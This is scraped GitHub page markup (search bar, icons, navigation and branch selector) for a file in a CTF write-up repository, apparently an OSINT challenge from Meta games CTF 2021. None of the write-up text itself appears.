placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="LFE5XkNpBFw0m0zffdcWXoqNVKqayVS8sOCP5s3dSBRsWuoyqNylpgJuSpYNMj+OVaqfxDRidbVZ+sTmlBPTOA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> palanioffcl </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>0</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/palanioffcl/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":426049755,"originating_url":"https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md","user_id":null}}" data-hydro-click-hmac="b1e3272eb61324ca5c737cfd96eb3f5ee254bfb5d1b4dabd76c8c58688b97574"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>3dfbfc9f6d</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/palanioffcl/CTF-Writeups/refs" cache-key="v0:1639277858.428184" current-committish="M2RmYmZjOWY2ZDUzNmY2ZjQyNzU4ZGE3MTFkMjgwZGZlNjFjZjlkMg==" default-branch="bWFpbg==" name-with-owner="cGFsYW5pb2ZmY2wvQ1RGLVdyaXRldXBz" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
